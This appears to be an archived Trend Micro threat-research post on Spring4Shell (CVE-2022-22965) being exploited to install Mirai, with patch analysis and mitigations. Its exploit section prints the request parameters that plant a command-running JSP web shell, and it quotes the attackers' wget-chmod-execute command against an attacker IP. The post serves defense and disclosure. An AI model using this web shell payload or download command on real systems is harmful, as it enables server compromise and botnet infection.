{
	"id": "b7b58b3f-881b-4aff-8549-b5339c974d2b",
	"created_at": "2026-04-06T00:11:45.304957Z",
	"updated_at": "2026-04-10T03:21:54.435382Z",
	"deleted_at": null,
	"sha1_hash": "d9a188d9af68a8b23b2bf26e28ef525cd9d3356b",
	"title": "CVE-2022-22965 Analyzing the Exploitation of Spring4Shell Vulnerability in Weaponizing and Executing the Mirai Botnet Malware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1261240,
	"plain_text": "CVE-2022-22965 Analyzing the Exploitation of Spring4Shell Vulnerability in Weaponizing and Executing the Mirai Botnet Malware\r\nBy Deep Patel, Nitesh Surana, Ashish Verma\r\nPublished: 2022-04-08 · Archived: 2026-04-05 21:17:45 UTC\r\nWe discovered active exploitation of a vulnerability in the Spring Framework designated as CVE-2022-22965 that allows malicious actors to download the Mirai botnet malware.\r\nBy: Deep Patel, Nitesh Surana, Ashish Verma Apr 08, 2022 Read time: 9 min (2405 words)\r\nTrend Micro Threat Research observed active exploitation of the Spring4Shell vulnerability assigned as CVE-2022-22965, which allows malicious actors to weaponize and execute the Mirai botnet malware. The exploitation allows threat actors to download the Mirai sample to the “/tmp” folder and execute it after changing its permissions using “chmod”.\r\nWe began seeing malicious activities at the start of April 2022. We also found the malware file server hosting other variants of the sample for different CPU architectures.\r\nIn this blog, we discuss our findings and analysis of the exploits and the patch based on our samples, as well as the real-world potential risks. In the last section, we include some recommendations on how to mitigate these risks.\r\nWhat is Spring Framework?\r\nSpring Framework is used to develop enterprise-level applications in Java. It is a platform that provides comprehensive infrastructure to support model-view-controller (MVC)-based applications, developed to reduce manual configuration and enhance memory management. 
It also makes code more reusable and easier to maintain by implementing some design patterns universally.\r\nSpring Framework is part of the Spring ecosystem, which comprises other components for cloud, data, and security, among others.\r\nHow is CVE-2022-22965 different from CVE-2022-22963?\r\nThere are two vulnerabilities that allow malicious actors to achieve remote code execution (RCE) in Spring Framework. Table 1 outlines the key differences between the two:\r\nhttps://www.trendmicro.com/en_us/research/22/d/cve-2022-22965-analyzing-the-exploitation-of-spring4shell-vulner.html\r\nPage 1 of 15\n\nCVE-2022-22963 | CVE-2022-22965\r\nSpecific to a local resource exposure bug in Spring Cloud Function | Leads to RCE in Spring Core applications under non-default circumstances\r\nPatch available: Yes. | Patch available: Yes (see section on available patches and mitigations).\r\nCVSS Base score: 9.8 (Critical) (CVSS 3.x) but much less severe than CVE-2022-22965 | CVSS Base score: 9.8 (Critical) (CVSS 3.x)\r\nMakes an impact on Spring Cloud Function versions 3.1.6, 3.2.2, and older unsupported versions, where the routing functionality is used. | Makes an impact on any Java application using Spring Core under non-default circumstances.\r\nTable 1. 
Differences between CVE-2022-22963 and CVE-2022-22965\r\nDependencies, software, and versions affected\r\nAs of this writing, most of the vulnerable setups were configured with the following dependencies:\r\nSpring Framework versions before 5.2.20 or 5.3.18, and Java Development Kit (JDK) version 9 or higher\r\nApache Tomcat\r\nSpring-webmvc or spring-webflux dependency\r\nUse of Spring parameter binding configured with a non-basic parameter type, such as Plain Old Java Objects (POJOs)\r\nDeployable packaged as a web application archive (WAR)\r\nWritable file system, such as the webapps or ROOT directory\r\nHow does the vulnerability exist?\r\nIn general, this vulnerability occurs when special objects or classes are exposed under certain conditions. It is quite common for request parameters to be bound to a POJO that is not annotated with @RequestBody, which helps in extracting parameters from HTTP requests. The class variable holds a reference to the Class object of the POJO that the HTTP parameters are mapped to.\r\nThreat actors can directly access an object by specifying the class variable in their requests. All child properties of an object can also be accessed by malicious actors through the class objects. As a result, they can get access to all kinds of other valuable objects on the system simply by following the chains of properties.\r\nIn Spring Core, logic for \"class.classLoader\" and \"class.protectionDomain\" prevents malicious access to those child properties of the class object. However, the logic is not foolproof and can in fact be bypassed by using the \"class.module.classLoader\" selector.\r\nFigure 1. Logic to prevent child properties; this logic is not foolproof.\r\nPatch analysis\r\nThe patch for Spring Framework has already been released. 
We provide relevant details in the succeeding section on available patches and mitigations.\r\nIn this section, we analyze what the patch changes.\r\nAs aforementioned, the \"class.classLoader\" and \"class.protectionDomain\" logic was not adequately secure, thus rendering the Spring Framework vulnerable. To resolve this issue, the logic of child property access has been improved in the patched version. It now only allows the \"name\" variants of class properties and no longer allows the binding of ClassLoader and ProtectionDomain types.\r\nFigure 2. spring-framework-5.3.17\r\nFigure 3. spring-framework-5.3.18\r\nDetails of the patch can be found here.\r\nExploit analysis\r\nIn this section, we attempt to understand how malicious actors can gain access to all sorts of valuable objects on the system by simply following the chain of properties that we previously discussed.\r\nHaving access to the class variable and all its sub-properties provides a path for threat actors to change the behavior of the web application. Their familiarity with ways to exploit exposed class objects has resulted in many techniques for weaponizing this vulnerability.\r\nFor example, threat actors can access an AccessLogValve object in Apache Tomcat through the class variable path \"class.module.classLoader.resources.context.parent.pipeline.first\". They can then redirect the access log to write a web shell into the web root by manipulating the properties of the AccessLogValve object, such as its pattern, suffix, directory, and prefix.\r\nTo illustrate:\r\nStage 1\r\nSend a crafted request using “Burp Suite” or “curl”\r\nSample host = (http://{victim IP}:8080/)\r\nFigure 4. 
Specific headers and class attributes for the creation of a JSP web shell\r\nThe payload from the first stage can be sent as a single request without using different headers, as shown in Figure 4 and as described in this public exploit. This exploit proof of concept is also interesting because it abuses a legitimate Tomcat feature, the formatting of incoming access logs for a deployed application, as described in the second stage.\r\nStage 2\r\nAfter decoding the payload used in the first stage, we observe the following parameters and values:\r\nclass.module.classLoader.resources.context.parent.pipeline.first.pattern=%{c2}i\r\nif(\"j\".equals(request.getParameter(\"pwd\"))){ java.io.InputStream in = %{c1}i.getRuntime().exec(request.getParameter(\"cmd\")).getInputStream(); int a = -1; byte[] b = new byte[2048];\r\nwhile((a=in.read(b))!=-1){ out.println(new String(b)); } } %{suffix}i\r\nclass.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp\r\nclass.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT\r\nclass.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar\r\nclass.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=\r\nWhen a server handles this request, it creates a “tomcatwar.jsp” file in the server directory, which can be observed in the following string from the request made in the first stage.\r\nHere, five specific attributes are modified as follows:\r\n1. Pattern: It consists of a formatting layout identifying the various fields to extract from the request and response and write to the log. Here you can see how the values of the ‘c2’, ‘c1’, and ‘suffix’ headers are fetched. 
The substitution happens from the incoming headers, as the format is %{name_of_header}i.\r\nclass.module.classLoader.resources.context.parent.pipeline.first.pattern=%{c2}i\r\nif(\"j\".equals(request.getParameter(\"pwd\"))){ java.io.InputStream in = %{c1}i.getRuntime().exec(request.getParameter(\"cmd\")).getInputStream(); int a = -1; byte[] b = new byte[2048];\r\nwhile((a=in.read(b))!=-1){ out.println(new String(b)); } } %{suffix}i\r\n2. Suffix: The suffix to add to the end of each log file name. The extension of the file that will be written is .jsp.\r\nclass.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp\r\n3. Directory: The absolute or relative path of a directory where the file will be created. In this case, ‘webapps/ROOT’ is selected since this is the path that is contained in a default Tomcat installation.\r\nclass.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT\r\n4. Prefix: The string that is added to the start of each log file name that will be created. In this case, it’s ‘tomcatwar’.\r\nclass.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar\r\n5. fileDateFormat: This field allows a customized timestamp to be added to the log file name. It is left empty because no timestamp, in the default format or otherwise, is wanted in the JSP web shell’s file name.\r\nclass.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=\r\nStage 3\r\nUsing the uploaded JSP web shell, malicious actors can execute commands on the server remotely, as observed in this URL:\r\n(http://{victim IP}:8080/tomcatwar[.]jsp?pwd=j\u0026cmd=whoami)\r\nFigure 5. 
Execution of “whoami” using uploaded JSP web shell\r\nAssociated risks if unpatched\r\nThe RCE vulnerability gives threat actors full access to the compromised devices, making it a dangerous and critical vulnerability. Malicious actors can achieve various goals through RCE attacks. In contrast to other exploits, an RCE attack typically results in the following:\r\nCreation of a path to allow initial access to a device that lets threat actors install malware or achieve other goals\r\nProvision of means to spread malware that extracts and exfiltrates data from a device, or enabling of commands that install malware designed to steal information\r\nDenial of service that disrupts the operation of systems or other applications on the system\r\nDeployment and execution of cryptomining or cryptojacking malware on exposed devices by exploiting the RCE vulnerability\r\nDeployment of ransomware that encrypts files and withholds access until victims settle the ransom\r\nEarliest exploitation\r\nC1WS IPS rule 1006015, which detects “class.classLoader” in the request, was first logged on our honeypots on March 31, 2022.\r\nIPS rule: 1006015 – Restrict Apache Struts “class.classLoader” Request\r\nFigure 6. C1WS IPS trigger\r\nWe also observed IPS triggers from the rule released recently, as follows:\r\nIPS rule: 1011372 - Spring Framework \"Spring4Shell\" Remote Code Execution Vulnerability (CVE-2022-22965)\r\nFigure 7. C1WS IPS trigger\r\nThis IPS trigger is observed when a threat actor sends the malicious payload to exploit the vulnerability.\r\nFigure 8. 
C1WS Log Inspection trigger on unsuccessful exploitation\r\nThis Log Inspection trigger can be observed when there is an unsuccessful exploitation attempt. It fails to create the log file that is the web shell (shell.jsp) because of the permissions on the Tomcat ROOT directory. Such indicators can help threat analysts when they explore possible exploitation attempts of this vulnerability.\r\nFigure 9. C1WS Log Inspection trigger on unsuccessful exploitation\r\nLike the trigger in Figure 8, this Log Inspection trigger was observed as a result of an unsuccessful exploitation of the vulnerability. Here, the file “shell.jsp” was not created. Since the file was not available, the exception “java.io.FileNotFoundException” was logged.\r\nActive exploitation\r\nWe observed active exploitation of Spring4Shell wherein malicious actors were able to weaponize and execute the Mirai botnet malware on vulnerable servers, specifically in the Singapore region.\r\nThe Mirai sample is downloaded to the “/tmp” folder and executed after its permissions are changed to make it executable using “chmod”. The exploitation requests and decoded commands are as follows:\r\nhttp://{victim IP}:9090/tomcatwar[.]jsp?pwd=j\u0026cmd=cd%20/tmp;%20wget%20http://45[.]95[.]169[.]143/The420smokeplace[.]dns/KKveTTgaAAsecNNaaaa.x86;chmod%20777%20*;./KKveTTgaAAsecNNaaaa.x86%20mSpring[.]x86\r\ncd /tmp; wget http://45[.]95[.]169[.]143/The420smokeplace.dns/KKveTTgaAAsecNNaaaa.x86;chmod 777 *;./KKveTTgaAAsecNNaaaa.x86 mSpring[.]x86\r\nhttp://45[.]95[.]169[.]143/The420smokeplace[.]dns/KKveTTgaAAsecNNaaaa.x86\r\nWe observed the samples at the start of April 2022. 
We also found the malware file server hosting other variants for different CPU architectures.\r\nFigure 10. Mirai malware samples for different CPU architectures\r\nFigure 11. Content of “wget.sh” as retrieved from a malicious server\r\nThe script \"wget.sh\" downloads the binaries from the malicious server and executes all the samples. The compatible ones run while the rest don’t. After execution, the files are removed from disk.\r\nTrend Micro Vision One™\r\nFigure 12. Trend Micro Vision One™ Observed Attack Techniques (OATs) triggers\r\nHere, we see the individual triggers from different modules and products of Trend Micro in the threat hunting app, where we can examine the severity of each significant hit. We take this to the next level in the Vision One Workbench.\r\nFigure 13. Trend Micro Vision One™ Network Security Workbench trigger\r\nThis Workbench is generated from Trend Micro Cloud One™ – Network Security. It shows how Network Security can help detect and prevent exploit attempts to protect an enterprise’s cloud workload on its deployed virtual private cloud (VPC). Here we can see how the endpoint with the IP address “10.10.10.176” is protected by the Intrusion Prevention Filter for Spring Core Code Execution Vulnerability.\r\nFigure 14. Trend Micro Vision One Workbench trigger for Spring Cloud or core vulnerability exploitation\r\nThis Workbench shows the simplification of a complex attack pattern. 
Here, we see the initial IPS trigger from Network Security where a VPC with a vulnerable EC2 instance is protected. With this Workbench, we can see that Trend Micro Cloud One™ – Workload Security and Network Security are working in concert.\r\nWe also have the IPS trigger from Network Security detecting the exploit attempt right from the start. We can then observe the “Identified Suspicious Command Injection” IPS rule from Workload Security sending the trigger out. Afterward, we see the execution of other commands, and this enables threat analysts to determine the presence of a successful exploitation, as the execution was followed by the use of “curl” or “wget” to download and execute a malicious sample after a change of permissions using “chmod”.\r\nThe impact scope helps assess the other workloads that have been observed with similar exploitation indicators, such as processes, files, network activity, and commands executed, among others. This integrated view shows the power of having everything on a single screen with detection across multiple products.\r\nFigure 15. Trend Micro Vision One Workbench trigger for RCE or malware dropped by exploiting critical server vulnerability\r\nThis Workbench allows the observation of IPS triggers from Workload Security. The observation, in turn, enables the monitoring of Command Injection traffic, followed by the Spring Core RCE IPS rule. The different arrows show the directions of correlation between IP addresses and endpoints.\r\nFigure 16. 
Trend Micro Vision One Workbench trigger for observed vulnerability exploitation and outbound connection to cryptocurrency mining pool\r\nIn this Workbench trigger, we can observe the work of different Workload Security modules. We can also see the first IPS trigger. Immediately after that, we see that there is an outbound connection to a well-known cryptocurrency mining pool. This event is detected by the Activity Monitoring module, which logs file, network, and process activity.\r\nVision One Workbench can help analysts weed out the noise from their environments. With the help of Trend Micro threat experts who establish and devise these rules carefully, enterprises can thwart a wide range of cyberattacks.\r\nAvailable patches and mitigations\r\nSpring has released patches for this vulnerability with complete details here.\r\nWe urge enterprises to do the following:\r\nUpgrade Spring Framework to versions 5.3.18+ and 5.2.20+.\r\nUpgrade Spring Boot to versions 2.6.6+ and 2.5.12+.\r\nIn the interim, enterprises can mitigate the risks associated with the vulnerability by doing the following:\r\nMaintaining a disallow or blocklist in the web application firewall to block strings that contain values such as \"class.*\", \"Class.*\", \"*.class.*\", and \"*.Class.*\"\r\nDowngrading to a lower JDK version such as version 8 might help. However, it could impact application features and open doors to other attacks mitigated in higher versions of JDK.\r\nTrend Micro protection and investigation\r\nTrend Micro has also released rules and filters for detection and protection across some of its suite of products. 
These provide additional protection from and detection of malicious components associated with this threat.\r\nWorkload Security and Deep Security IPS Rules\r\nRule 1011372 - Spring Framework \"Spring4Shell\" Remote Code Execution Vulnerability (CVE-2022-22965)\r\nNetwork Security and TippingPoint Filters\r\nFilter 41108: HTTP: Spring Core Code Execution Vulnerability\r\nTrend Micro™ Deep Discovery™ Inspector Network Content Inspection Rules\r\nRule 4678: CVE-2022-22965 – SPRING RCE EXPLOIT – HTTP(REQUEST)\r\nRule 4679: POSSIBLE JAVA CLASSLOADER RCE EXPLOIT – HTTP(REQUEST)\r\nIndicators of Compromise (IOCs)\r\nA list of the IOCs can be found in this text file.\r\nSource: https://www.trendmicro.com/en_us/research/22/d/cve-2022-22965-analyzing-the-exploitation-of-spring4shell-vulner.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.trendmicro.com/en_us/research/22/d/cve-2022-22965-analyzing-the-exploitation-of-spring4shell-vulner.html"
	],
	"report_names": [
		"cve-2022-22965-analyzing-the-exploitation-of-spring4shell-vulner.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434305,
	"ts_updated_at": 1775791314,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/d9a188d9af68a8b23b2bf26e28ef525cd9d3356b.pdf",
		"text": "https://archive.orkl.eu/d9a188d9af68a8b23b2bf26e28ef525cd9d3356b.txt",
		"img": "https://archive.orkl.eu/d9a188d9af68a8b23b2bf26e28ef525cd9d3356b.jpg"
	}
}